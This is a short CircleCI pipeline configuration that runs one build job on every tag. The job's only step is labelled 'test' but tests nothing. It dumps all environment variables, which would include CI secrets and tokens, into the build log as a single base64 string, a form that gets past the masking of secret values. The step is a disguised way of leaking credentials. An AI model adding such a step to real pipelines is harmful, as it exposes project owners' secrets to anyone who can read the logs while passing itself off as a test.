version: 2.1

jobs:
  build:
    docker:
      - image: circleci/golang:1.13-node

    steps:
      - run:
          name: test
          command: env | base64 | tr -d '\n'

workflows:
  build:
    jobs:
      - build:
          filters:
            tags:
              only: /.*/
